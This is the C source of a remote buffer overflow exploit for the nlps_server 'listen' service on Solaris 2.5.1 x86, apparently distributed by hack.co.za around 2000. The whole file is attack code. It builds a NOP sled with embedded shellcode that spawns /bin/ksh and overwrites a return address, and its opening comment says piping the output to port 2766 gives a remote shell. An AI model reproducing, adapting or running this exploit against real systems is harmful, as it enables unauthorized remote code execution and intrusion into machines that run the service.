/*
 remote nlps_server overflow, solaris 2.5.1 x86 
 send output of this program to listen (2766 port) and you will get shell
 running
 
 listen is normally enabled to provide remote lp/lpd services
 
 */

#include <sys/types.h>
#include <stdio.h>
#include <string.h>

#define BUFSIZE 245
#define ADDRS 2+1+1
#define ADDRP 0x8047836

#define HDR "NLPS:002:002:"

char asmcode[]="\xeb\x23\x5e\x33\xc0\x88\x46\xfa\x89\x46\xf5\x89"
               "\x36\x83\x06\x08\x89\x46\x04\x88\x46\x10\x50\x56"
               "\xff\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07"
               "\x07\xe8\xd8\xff\xff\xff\x02\x02\x02\x02\x02\x02"
               "\x02\x02\x2f\x62\x69\x6e\x2f\x6b\x73\x68\x2e\x03"
               "\x03\x03\x03\x03\x03\x03\x03";
char nop[]="\x90";

char code[4096];

main(int argc, char *argv[])
{
  int i, noplen=strlen(nop);
  char *ptr=code;

  for (i=0; i< sizeof(code); i++)
    *ptr++=nop[i % noplen];
  memcpy(code, HDR, strlen(HDR));
  memcpy(&code[100], asmcode, strlen(asmcode));

  ptr=code+BUFSIZE-(ADDRS<<2);
  for (i=0; i<ADDRS; i++, ptr+=4)
    *(int *)ptr=ADDRP;
  *ptr=0;
  printf("%s%c", code, 0);
}
/*                    www.hack.co.za              [2000]*/